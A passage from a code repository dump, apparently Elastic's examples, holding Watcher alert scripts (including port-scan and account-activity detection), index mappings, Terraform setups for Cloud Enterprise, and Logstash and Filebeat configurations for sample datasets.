4 |     "source": "return ctx.payload.aggregations.nodes.buckets.stream().filter(it -> it.free_ratio.value < ctx.metadata.lower_bound).map(it -> ['node_name':it.key,'available_in_gb':Math.round((it.available_in_bytes.value/1073741824) * 100)/100.0,'total_in_gb':Math.round((it.total_in_bytes.value/1073741824) * 100)/100.0]).collect(Collectors.toList());"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/new_process_started/mapping.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "mappings": {
 3 |       "properties": {
 4 |         "@timestamp": {
 5 |           "type": "date"
 6 |         },
 7 |         "process_host": {
 8 |           "type": "keyword"
 9 |         },
10 |         "event_type": {
11 |           "type": "keyword"
12 |         }
13 |       }
14 |   }
15 | }
16 | 


--------------------------------------------------------------------------------
/Alerting/Sample Watches/new_process_started/scripts/condition.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "return ctx.payload.started_processes.aggregations.process_hosts.buckets.size() != ctx.payload.history_started_processes.aggregations.process_hosts.buckets.size();"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/new_process_started/scripts/transform.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "def history=ctx.payload.history_started_processes.aggregations.process_hosts.buckets.stream().map(p -> p.key).collect(Collectors.toList()); def new_starts=ctx.payload.started_processes.aggregations.process_hosts.buckets.stream().map(e -> e.key).filter(p -> !history.contains(p)); return new_starts.map(p -> p.replace('-',' on server ')).collect(Collectors.toList());"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/port_scan/mapping.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "mappings": {
 3 |       "properties": {
 4 |         "source_dest": {
 5 |           "type": "keyword"
 6 |         },
 7 |         "source_dest_port": {
 8 |           "type": "keyword"
 9 |         },
10 |         "port": {
11 |           "type": "integer"
12 |         },
13 |         "@timestamp":{
14 |           "type":"date"
15 |         }
16 |       }
17 |   }
18 | }
19 | 


--------------------------------------------------------------------------------
/Alerting/Sample Watches/port_scan/scripts/condition.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "def sensitivity = ctx.metadata.sensitivity; if (ctx.payload.aggregations.source_dest.buckets.size() == 0) return false; return ctx.payload.aggregations.source_dest.buckets.stream().anyMatch(p -> p.port_stats.std_deviation > 0 && (p.series.buckets[p.series.buckets.length-1].num_ports.value > ((sensitivity * p.port_stats.std_deviation)+p.median_ports.values['50.0'])));"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/port_scan/scripts/index_transform.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "def triggered_time = ctx.trigger.triggered_time; def sensitivity = ctx.metadata.sensitivity; return ['_doc':ctx.payload.aggregations.source_dest.buckets.stream().filter(p -> p.port_stats.std_deviation > 0 && (p.series.buckets[p.series.buckets.length-1].num_ports.value > ((sensitivity * p.port_stats.std_deviation)+p.median_ports.values['50.0']))).map(e -> ['@timestamp':triggered_time,'source_dest':e.key,'source':e.key.split('_')[0],'dest':e.key.split('_')[1],'port_count':e.series.buckets[e.series.buckets.length-1].num_ports.value])];"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/port_scan/scripts/log_transform.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "def sensitivity = ctx.metadata.sensitivity; return ctx.payload.aggregations.source_dest.buckets.stream().filter(p -> p.port_stats.std_deviation > 0 && (p.series.buckets[p.series.buckets.length-1].num_ports.value > ((sensitivity * p.port_stats.std_deviation)+p.median_ports.values['50.0']))).map(p -> p.key.replace('_',' to ')).collect(Collectors.toList());"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/requirements.txt:
--------------------------------------------------------------------------------
 1 | cffi==1.11.5
 2 | cryptography==2.2.2
 3 | elasticsearch==6.0.0
 4 | elasticsearch-xpack==6.0.0
 5 | idna==2.1
 6 | lxml==3.6.4
 7 | ndg-httpsclient==0.4.4
 8 | ordereddict==1.1
 9 | protobuf==3.1.0.post1
10 | pyasn1==0.1.9
11 | pycparser==2.14
12 | pyOpenSSL==17.5.0
13 | simplejson==3.8.2
14 | six==1.10.0
15 | urllib3==1.22
16 | 


--------------------------------------------------------------------------------
/Alerting/Sample Watches/run_all_tests.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 | set -o nounset -o pipefail -o errexit
3 | 
4 | ./run_test.sh '**' "${1:-}" "${2:-}" "${3:-}" "${4:-}" "${5:-}"
5 | 


--------------------------------------------------------------------------------
/Alerting/Sample Watches/system_fails_to_provide_data/mapping.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "mappings": {
 3 |       "properties": {
 4 |         "host": {
 5 |           "type": "keyword"
 6 |         }
 7 |       }
 8 |   }
 9 | }
10 | 


--------------------------------------------------------------------------------
/Alerting/Sample Watches/system_fails_to_provide_data/scripts/condition.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "return ctx.payload.aggregations.periods.buckets.history.hosts.buckets.size() > ctx.payload.aggregations.periods.buckets.last_period.hosts.buckets.size();"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/system_fails_to_provide_data/scripts/transform.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "def last_period=ctx.payload.aggregations.periods.buckets.last_period.hosts.buckets.stream().map(e -> e.key).collect(Collectors.toList()); return ctx.payload.aggregations.periods.buckets.history.hosts.buckets.stream().map(e -> e.key).filter(p -> !last_period.contains(p)).collect(Collectors.toList());"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/system_fails_to_provide_data/tests/test1.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "watch_name": "system_fails_to_provide_data",
 3 |   "mapping_file": "./system_fails_to_provide_data/mapping.json",
 4 |   "index": "log",
 5 |   "type": "doc",
 6 |   "match": true,
 7 |   "watch_file": "./system_fails_to_provide_data/watch.json",
 8 |   "scripts":[{"name":"transform","path":"./system_fails_to_provide_data/scripts/transform.json"},{"name":"condition","path":"./system_fails_to_provide_data/scripts/condition.json"}],
 9 |   "events": [
10 |     {
11 |       "offset": -360,
12 |       "host": "serverA"
13 |     },
14 |     {
15 |       "offset": -180,
16 |       "host": "serverA"
17 |     },
18 |     {
19 |       "offset": -360,
20 |       "host": "serverB"
21 |     }
22 |   ],
23 |   "expected_response": "Systems not responding in the last 5m minutes:serverB:"
24 | }
25 | 


--------------------------------------------------------------------------------
/Alerting/Sample Watches/twitter_trends/mapping.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "mappings": {
 3 |       "properties": {
 4 |         "@timestamp": {
 5 |           "type": "date",
 6 |           "format": "dateOptionalTime"
 7 |         },
 8 |         "text": {
 9 |           "type": "text",
10 |           "fields": {
11 |             "raw": {
12 |               "type": "keyword",
13 |               "ignore_above": 256
14 |             }
15 |           }
16 |         }
17 |       }
18 |   }
19 | }
20 | 


--------------------------------------------------------------------------------
/Alerting/Sample Watches/twitter_trends/scripts/condition.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "return ctx.payload.aggregations.date_buckets.buckets[ctx.payload.aggregations.date_buckets.buckets.length-1].doc_count > (ctx.payload.aggregations.percentiles.values['90.0']+(ctx.payload.aggregations.stats.std_deviation*3));"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/unexpected_account_activity/mapping.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "mappings": {
 3 |       "properties": {
 4 |         "event_type": {
 5 |           "type": "keyword"
 6 |         },
 7 |          "user": {
 8 |           "type": "keyword"
 9 |         },
10 |         "@timestamp":{
11 |           "type":"date"
12 |         }
13 |       }
14 |   }
15 | }
16 | 


--------------------------------------------------------------------------------
/Alerting/Sample Watches/unexpected_account_activity/scripts/condition.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "def removes=ctx.payload.aggregations.event_types.buckets.remove.users.buckets.stream().map(p -> p.key).collect(Collectors.toList()); return ctx.payload.aggregations.event_types.buckets.add.users.buckets.stream().map(p -> p.key).filter(p -> removes.contains(p)).toArray().length > 0;"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/unexpected_account_activity/scripts/transform.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "def removes=ctx.payload.aggregations.event_types.buckets.remove.users.buckets.stream().map(p -> p.key).collect(Collectors.toList()); return ctx.payload.aggregations.event_types.buckets.add.users.buckets.stream().map(p -> p.key).filter(p -> removes.contains(p)).toArray();"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Cloud Enterprise/Getting Started Examples/aws/terraform/.gitignore:
--------------------------------------------------------------------------------
1 | .terraform
2 | *.tfstate*
3 | terraform.tfvars
4 | bootstrap-secrets.json
5 | 


--------------------------------------------------------------------------------
/Cloud Enterprise/Getting Started Examples/aws/terraform/main.tf:
--------------------------------------------------------------------------------
 1 | terraform {
 2 |   required_version = ">=0.12.0"
 3 | }
 4 | 
 5 | # Initiate ece installation through ansible playbook
 6 | resource "null_resource" "run-ansible" {
 7 |   provisioner "local-exec" {
 8 |     command = data.template_file.ansible-install.rendered
 9 |   }
10 | }
11 | 
12 | output "ece-instances" {
13 |    description = "The public DNS of the created server instances."
14 |    value = [aws_instance.server.*.public_dns]
15 | }
16 | 
17 | output "ece-ui-url" {
18 |    value = format("https://%s:12443",aws_instance.server.0.public_dns)
19 | }
20 | 
21 | output "ece-api-url" {
22 |    value = format("https://%s:12343",aws_instance.server.0.public_dns)
23 | }
24 | 


--------------------------------------------------------------------------------
/Cloud Enterprise/Getting Started Examples/aws/terraform/provider.tf:
--------------------------------------------------------------------------------
 1 | provider "aws" {
 2 |   region  = var.aws_region
 3 | 
 4 |   # You can use access keys
 5 |   access_key = var.aws_access_key
 6 |   secret_key = var.aws_secret_key
 7 | 
 8 |   # Or specify an aws profile, instead.
 9 |   # profile = "<aws profile>"
10 | }


--------------------------------------------------------------------------------
/Cloud Enterprise/Getting Started Examples/aws/terraform/terraform.tfvars.example:
--------------------------------------------------------------------------------
 1 | ## See variables.tf for descriptions
 2 | 
 3 | project_name = "ece-terraform-example"
 4 | 
 5 | trusted_network = "<your ip>/32"
 6 | 
 7 | ## AWS provider settings
 8 | aws_access_key = "<your key>"
 9 | aws_secret_key = "<your secret>"
10 | #aws_region = "us-east-1"
11 | #public_key = "~/.ssh/id_rsa.pub"
12 | #private_key = "~/.ssh/id_rsa"
13 | 


--------------------------------------------------------------------------------
/Cloud Enterprise/Getting Started Examples/gcp/terraform/.gitignore:
--------------------------------------------------------------------------------
1 | .terraform
2 | *.tfstate*
3 | terraform.tfvars
4 | bootstrap-secrets.json
5 | 


--------------------------------------------------------------------------------
/Cloud Enterprise/Getting Started Examples/gcp/terraform/main.tf:
--------------------------------------------------------------------------------
 1 | resource "null_resource" "run-ansible" {
 2 | 
 3 |   # Makes sure ansible runs after all resources are available
 4 |   depends_on = [google_compute_instance.server,google_compute_disk.disk,google_compute_firewall.administration]
 5 | 
 6 |   provisioner "local-exec" {
 7 |     command = data.template_file.ansible-install.rendered
 8 |   }
 9 | }
10 | 
11 | output "ece-ui-url" {
12 |   value = format("https://%s:12443", google_compute_instance.server[0].network_interface[0].access_config[0].nat_ip)
13 | }
14 | 
15 | output "ece-api-url" {
16 |   value = format("https://%s:12343",google_compute_instance.server[0].network_interface[0].access_config[0].nat_ip)
17 | }
18 | 
19 | output "ece-instances" {
20 |   description = "The public IP of the created server instances."
21 |   value = [google_compute_instance.server[*].network_interface[0].access_config[0].nat_ip]
22 | }


--------------------------------------------------------------------------------
/Cloud Enterprise/Getting Started Examples/gcp/terraform/provider.tf:
--------------------------------------------------------------------------------
1 | provider "google" {
2 |   region      = var.region
3 |   project     = var.project
4 |   credentials = file(format("~/.config/gcloud/%s",var.gcp_key_filename))
5 | }


--------------------------------------------------------------------------------
/Cloud Enterprise/Getting Started Examples/gcp/terraform/terraform.tfvars.example:
--------------------------------------------------------------------------------
1 | # See variables.tf for descriptions
2 | 
3 | project = "YOUR-CLOUD-PROJECT"
4 | 
5 | gcp_key_filename = "key-file-name.json"
6 | 
7 | name = "YOUR-NAME"
8 | 


--------------------------------------------------------------------------------
/Common Data Formats/apache_logs/apache_dashboard.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Common Data Formats/apache_logs/apache_dashboard.jpg


--------------------------------------------------------------------------------
/Common Data Formats/apache_logs/logstash/apache_logstash.conf:
--------------------------------------------------------------------------------
 1 | input {
 2 |   stdin { }
 3 | }
 4 | 
 5 | 
 6 | filter {
 7 |   grok {
 8 |     match => {
 9 |       "message" => '%{IPORHOST:clientip} %{USER:ident} %{USER:auth} \[%{HTTPDATE:timestamp}\] "%{WORD:verb} %{DATA:request} HTTP/%{NUMBER:httpversion}" %{NUMBER:response:int} (?:-|%{NUMBER:bytes:int}) %{QS:referrer} %{QS:agent}'
10 |     }
11 |   }
12 | 
13 |   date {
14 |     match => [ "timestamp", "dd/MMM/YYYY:HH:mm:ss Z" ]
15 |     locale => en
16 |   }
17 | 
18 |   geoip {
19 |     source => "clientip"
20 |   }
21 | 
22 |   useragent {
23 |     source => "agent"
24 |     target => "useragent"
25 |   }
26 | }
27 | 
28 | output {
29 |   stdout {
30 |     codec => dots {}
31 |   }
32 | 
33 |   elasticsearch {
34 |     index => "apache_elastic_example"
35 |     template => "./apache_template.json"
36 |     template_name => "apache_elastic_example"
37 |     template_overwrite => true
38 |   }
39 | }
40 | 


--------------------------------------------------------------------------------
/Common Data Formats/cef/cef_dashboard.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Common Data Formats/cef/cef_dashboard.png


--------------------------------------------------------------------------------
/Common Data Formats/cef/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | version: '2'
 2 | services:
 3 |   kibana:
 4 |     image: docker.elastic.co/kibana/kibana:5.1.1
 5 |     links:
 6 |       - elasticsearch
 7 |     ports:
 8 |       - 5601:5601
 9 | 
10 |   elasticsearch:
11 |     image: docker.elastic.co/elasticsearch/elasticsearch:5.1.1
12 |     cap_add:
13 |       - IPC_LOCK
14 |     volumes:
15 |       - esdata1:/usr/share/elasticsearch/data
16 |     ports:
17 |       - 9200:9200
18 |       
19 |   logstash:
20 |     build: logstash
21 |     links:
22 |       - elasticsearch
23 |     ports:
24 |       - 5000:5000
25 |       - 9600:9600
26 | 
27 | volumes:
28 |   esdata1:
29 |     driver: local
30 |         


--------------------------------------------------------------------------------
/Common Data Formats/cef/logstash/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM docker.elastic.co/logstash/logstash:5.1.1
2 | RUN rm -f /usr/share/logstash/pipeline/logstash.conf
3 | ADD pipeline/logstash.conf /usr/share/logstash/pipeline/logstash.conf
4 | ADD pipeline/cef_template.json /usr/share/logstash/cef_template.json


--------------------------------------------------------------------------------
/Common Data Formats/nginx_json_logs/logstash/nginx_json_logstash.conf:
--------------------------------------------------------------------------------
 1 | input {
 2 |   stdin {
 3 |     codec => json
 4 |     }
 5 | }
 6 | 
 7 | filter {
 8 | 
 9 |   date {
10 |     match => ["time", "dd/MMM/YYYY:HH:mm:ss Z" ]
11 |     locale => en
12 |   }
13 | 
14 |   geoip {
15 |     source => "remote_ip"
16 |     target => "geoip"
17 |   }
18 | 
19 |   useragent {
20 |     source => "agent"
21 |     target => "user_agent"
22 |   }
23 | 
24 |   grok {
25 |     match => [ "request" , "%{WORD:request_action} %{DATA:request1} HTTP/%{NUMBER:http_version}" ]
26 |   }
27 | }
28 | 
29 | output {
30 |   stdout  {
31 |     codec => dots {}
32 |   }
33 | 
34 |   elasticsearch {
35 |     index => "nginx_json_elastic_stack_example"
36 |     document_type => "logs"
37 |     template => "./nginx_json_template.json"
38 |     template_name => "nginx_json_elastic_stack_example"
39 |     template_overwrite => true
40 |   }
41 | 
42 | }
43 | 


--------------------------------------------------------------------------------
/Common Data Formats/nginx_json_logs/nginx_json_dashboard.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Common Data Formats/nginx_json_logs/nginx_json_dashboard.jpg


--------------------------------------------------------------------------------
/Common Data Formats/nginx_json_logs/nginx_json_filebeat.yml:
--------------------------------------------------------------------------------
 1 | filebeat.prospectors:
 2 | - input_type: log
 3 |   paths:
 4 |     - nginx_json_logs
 5 |   json.keys_under_root: true
 6 |   document_type: logs
 7 | 
 8 | output.elasticsearch:
 9 |   hosts: ["localhost:9200"]
10 |   index: "nginx_json_elastic"
11 |   pipeline: nginx_json_pipeline
12 | 
13 | setup.template.enabled: false


--------------------------------------------------------------------------------
/Common Data Formats/nginx_json_plus_logs/logstash/nginxplus_json_logstash.conf:
--------------------------------------------------------------------------------
 1 | input {
 2 |   stdin {
 3 |     codec => json
 4 |     }
 5 | }
 6 | 
 7 | filter {
 8 |   date {
 9 |     match => ["timestamp", "UNIX_MS"]
10 |   }
11 | }
12 | 
13 | output {
14 |   stdout { codec => dots }
15 | 
16 |   elasticsearch {
17 |     index => "nginxplus_json_elastic_stack_example"
18 |     document_type => "logs"
19 |     template => "./nginxplus_json_template.json"
20 |     template_name => "nginxplus_json_elastic_stack_example"
21 |     template_overwrite => true
22 |   }
23 | 
24 | }
25 | 


--------------------------------------------------------------------------------
/Common Data Formats/nginx_json_plus_logs/nginx_plus_json_dashboard.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Common Data Formats/nginx_json_plus_logs/nginx_plus_json_dashboard.jpg


--------------------------------------------------------------------------------
/Common Data Formats/nginx_json_plus_logs/nginxplus_filebeat.yml:
--------------------------------------------------------------------------------
 1 | filebeat.prospectors:
 2 | - input_type: log
 3 |   paths:
 4 |     - nginxplus_json_logs
 5 |   json.keys_under_root: true
 6 |   document_type: logs
 7 | 
 8 | output.elasticsearch:
 9 |   hosts: ["localhost:9200"]
10 |   index: "nginxplus_json"
11 |   pipeline: nginxplus_json_pipeline
12 | 
13 | setup.template.enabled: false


--------------------------------------------------------------------------------
/Common Data Formats/nginx_json_plus_logs/nginxplus_json_pipeline.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "description": "nginx plus json pipeline",
 3 |     "processors": [
 4 |       {
 5 |         "convert": {
 6 |           "field": "timestamp",
 7 |           "type": "string"
 8 |         }
 9 |       },
10 |       {
11 |         "date": {
12 |           "field": "timestamp",
13 |           "formats": [
14 |             "UNIX_MS"
15 |           ],
16 |           "target_field": "@timestamp"
17 |         }
18 |       }
19 |     ]
20 | }


--------------------------------------------------------------------------------
/Common Data Formats/nginx_logs/logstash/nginx_logstash.conf:
--------------------------------------------------------------------------------
 1 | input {
 2 |   stdin { }
 3 | }
 4 | 
 5 | filter {
 6 |   grok {
 7 |     match => {
 8 |       "message" => '%{IPORHOST:remote_ip} - %{DATA:user_name} \[%{HTTPDATE:time}\] "%{WORD:request_action} %{DATA:request} HTTP/%{NUMBER:http_version}" %{NUMBER:response} %{NUMBER:bytes} "%{DATA:referrer}" "%{DATA:agent}"'
 9 |     }
10 |   }
11 | 
12 |   date {
13 |     match => [ "time", "dd/MMM/YYYY:HH:mm:ss Z" ]
14 |     locale => en
15 |   }
16 | 
17 |   geoip {
18 |     source => "remote_ip"
19 |     target => "geoip"
20 |   }
21 | 
22 |   useragent {
23 |     source => "agent"
24 |     target => "user_agent"
25 |   }
26 | }
27 | 
28 | output {
29 |   stdout {
30 |     codec => dots {}
31 |   }
32 |   elasticsearch {
33 |     index => "nginx_elastic_stack_example"
34 |     document_type => "logs"
35 |     template => "./nginx_template.json"
36 |     template_name => "nginx_elastic_stack_example"
37 |     template_overwrite => true
38 |   }
39 | }
40 | 


--------------------------------------------------------------------------------
/Common Data Formats/nginx_logs/nginx_dashboard.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Common Data Formats/nginx_logs/nginx_dashboard.jpg


--------------------------------------------------------------------------------
/Common Data Formats/twitter/twitter_dashboard.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Common Data Formats/twitter/twitter_dashboard.jpg


--------------------------------------------------------------------------------
/Common Data Formats/twitter/twitter_logstash.conf:
--------------------------------------------------------------------------------
 1 | input {
 2 |   twitter {
 3 |     consumer_key       => "INSERT YOUR CONSUMER KEY"
 4 |     consumer_secret    => "INSERT YOUR CONSUMER SECRET"
 5 |     oauth_token        => "INSERT YOUR ACCESS TOKEN"
 6 |     oauth_token_secret => "INSERT YOUR ACCESS TOKEN SECRET"
 7 |     keywords           => [ "thor", "spiderman", "wolverine", "ironman", "hulk"]
 8 |     full_tweet         => true
 9 |   }
10 | }
11 | 
12 | filter { }
13 | 
14 | output {
15 |   stdout {
16 |     codec => dots
17 |   }
18 |   elasticsearch {
19 |       hosts => "localhost:9200"
20 |       index         => "twitter_elastic_example"
21 |       document_type => "tweets"
22 |       template      => "./twitter_template.json"
23 |       template_name => "twitter_elastic_example"
24 |       template_overwrite => true
25 |   }
26 | }
27 | 


--------------------------------------------------------------------------------
/Exploring Public Datasets/cdc_nutrition_exercise_patterns/kibana_exercise_dashboard.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Exploring Public Datasets/cdc_nutrition_exercise_patterns/kibana_exercise_dashboard.jpg


--------------------------------------------------------------------------------
/Exploring Public Datasets/cdc_nutrition_exercise_patterns/kibana_nutrition_dashboard.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Exploring Public Datasets/cdc_nutrition_exercise_patterns/kibana_nutrition_dashboard.jpg


--------------------------------------------------------------------------------
/Exploring Public Datasets/cdc_nutrition_exercise_patterns/scripts/activity.csv:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Exploring Public Datasets/cdc_nutrition_exercise_patterns/scripts/activity.csv


--------------------------------------------------------------------------------
/Exploring Public Datasets/cdc_nutrition_exercise_patterns/scripts/requirements.txt:
--------------------------------------------------------------------------------
1 | elasticsearch==5.4.0
2 | numpy==1.11.2
3 | pandas==0.19.0
4 | python-dateutil==2.5.3
5 | pytz==2016.7
6 | six==1.10.0
7 | urllib3==1.18
8 | xport==0.6.4


--------------------------------------------------------------------------------
/Exploring Public Datasets/donorschoose/donorschoose_dashboard.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Exploring Public Datasets/donorschoose/donorschoose_dashboard.jpg


--------------------------------------------------------------------------------
/Exploring Public Datasets/donorschoose/scripts/requirements.txt:
--------------------------------------------------------------------------------
1 | elasticsearch==5.4.0
2 | numpy==1.11.2
3 | pandas==0.19.0
4 | python-dateutil==2.5.3
5 | pytz==2016.7
6 | six==1.10.0
7 | urllib3==1.22


--------------------------------------------------------------------------------
/Exploring Public Datasets/earthquakes/ncedc-earthquakes-dataset.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Exploring Public Datasets/earthquakes/ncedc-earthquakes-dataset.tar.gz


--------------------------------------------------------------------------------
/Exploring Public Datasets/earthquakes/ncedc-earthquakes-filebeat.yml:
--------------------------------------------------------------------------------
 1 | filebeat.prospectors:
 2 | - type: log
 3 |   fields_under_root: true
 4 |   paths:
 5 |     - ./ncedc-earthquakes-dataset/earthquakes.txt
 6 |   fields:
 7 |     type: earthquake
 8 | 
 9 | - type: log
10 |   fields_under_root: true
11 |   paths:
12 |     - ./ncedc-earthquakes-dataset/blasts.txt
13 |   fields:
14 |     type: blast
15 | 
16 | output.elasticsearch:
17 |   hosts: ["localhost:9200"]
18 |   index: "ncedc-earthquakes"
19 |   pipeline: ncedc-earthquakes
20 |   indices:
21 |     - index: "ncedc-earthquakes-earthquake"
22 |       when.equals:
23 |         type: "earthquake"
24 |     - index: "ncedc-earthquakes-blast"
25 |       when.equals:
26 |         type: "blast"
27 | setup.template.enabled: false


--------------------------------------------------------------------------------
/Exploring Public Datasets/earthquakes/ncedc-earthquakes-screenshot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Exploring Public Datasets/earthquakes/ncedc-earthquakes-screenshot.png


--------------------------------------------------------------------------------
/Exploring Public Datasets/nhl/against.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Exploring Public Datasets/nhl/against.png


--------------------------------------------------------------------------------
/Exploring Public Datasets/nhl/clean.sh:
--------------------------------------------------------------------------------
 1 | curl -XDELETE localhost:9200/nhl
 2 | curl -XPUT localhost:9200/nhl -d '{
 3 |   "mappings": {
 4 |     "play": {
 5 |       "dynamic_templates": [
 6 |         {
 7 |           "notanalyzed": {
 8 |             "match": "*",
 9 |             "match_mapping_type": "string",
10 |             "mapping": {
11 |               "type": "string",
12 |               "index": "analyzed",
13 |               "omit_norms": true,
14 |               "fields": {
15 |                 "raw": { "type": "string", "index": "not_analyzed" }
16 |               }
17 |             }
18 |           }
19 |         }
20 |       ]
21 |     }
22 |   }
23 | }'
24 | 


--------------------------------------------------------------------------------
/Exploring Public Datasets/nhl/game.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Exploring Public Datasets/nhl/game.png


--------------------------------------------------------------------------------
/Exploring Public Datasets/nhl/geo-arena/arena-viz.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Exploring Public Datasets/nhl/geo-arena/arena-viz.png


--------------------------------------------------------------------------------
/Exploring Public Datasets/nhl/geo-arena/arena.tiff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Exploring Public Datasets/nhl/geo-arena/arena.tiff


--------------------------------------------------------------------------------
/Exploring Public Datasets/nhl/geo-arena/kibana-settings.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Exploring Public Datasets/nhl/geo-arena/kibana-settings.png


--------------------------------------------------------------------------------
/Exploring Public Datasets/nhl/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "nhl-stats-elasticsearch",
 3 |   "version": "0.0.1",
 4 |   "scripts": {
 5 |     "go": "node go.js"
 6 |   },
 7 |   "dependencies": {
 8 |     "futures": "*",
 9 |     "request": "*"
10 |   }
11 | }
12 | 


--------------------------------------------------------------------------------
/Exploring Public Datasets/nyc_restaurants/restaurants_kibana.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Exploring Public Datasets/nyc_restaurants/restaurants_kibana.jpg


--------------------------------------------------------------------------------
/Exploring Public Datasets/nyc_restaurants/scripts/requirements.txt:
--------------------------------------------------------------------------------
 1 | elasticsearch==6.0
 2 | cython==0.26
 3 | geopy==1.11.0
 4 | numpy==1.11.2
 5 | pandas==0.19.0
 6 | python-dateutil==2.5.3
 7 | pytz==2016.7
 8 | six==1.10.0
 9 | urllib3==1.18
10 | certifi==2017.7.27.1
11 | 


--------------------------------------------------------------------------------
/Exploring Public Datasets/nyc_traffic_accidents/nyc_collision_filebeat.yml:
--------------------------------------------------------------------------------
 1 | filebeat.prospectors:
 2 | - type: log
 3 |   paths:
 4 |     - ./nyc_collision/nyc_collision_data.csv
 5 | 
 6 | output.elasticsearch:
 7 |   hosts: ["localhost:9200"]
 8 |   index: nyc_visionzero
 9 |   pipeline: nyc_collision
10 | 
11 | setup.template.enabled: false
12 | 


--------------------------------------------------------------------------------
/Exploring Public Datasets/usfec/scripts/usfec_logstash.conf:
--------------------------------------------------------------------------------
 1 | input {
 2 |   stdin {
 3 |     codec => json_lines {}
 4 |   }
 5 | }
 6 | 
 7 | filter {
 8 |   if !([transactionDate] == "") {
 9 |     date {
10 |       match => [ "transactionDate", "MMddyyyy", "MM/dd/yyyy" ]
11 |     }
12 |   }
13 |   mutate {
14 |     convert => ["transactionAmount", "float"]
15 |   }
16 | }
17 | 
18 | output {
19 |   stdout { codec => dots }
20 |   elasticsearch {
21 |     hosts => "localhost:9200"
22 |     index => "usfec_%{recordType}"
23 |     template => "usfec_template.json"
24 |     template_name => "usfec"
25 |     template_overwrite => true
26 |     user => "elastic"
27 |     password => "changeme"
28 |   }
29 | }
30 | 


--------------------------------------------------------------------------------
/Exploring Public Datasets/usfec/usfec_dashboard.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Exploring Public Datasets/usfec/usfec_dashboard.jpg


--------------------------------------------------------------------------------
/GCP Dataflow to Elasticsearch/.gitignore:
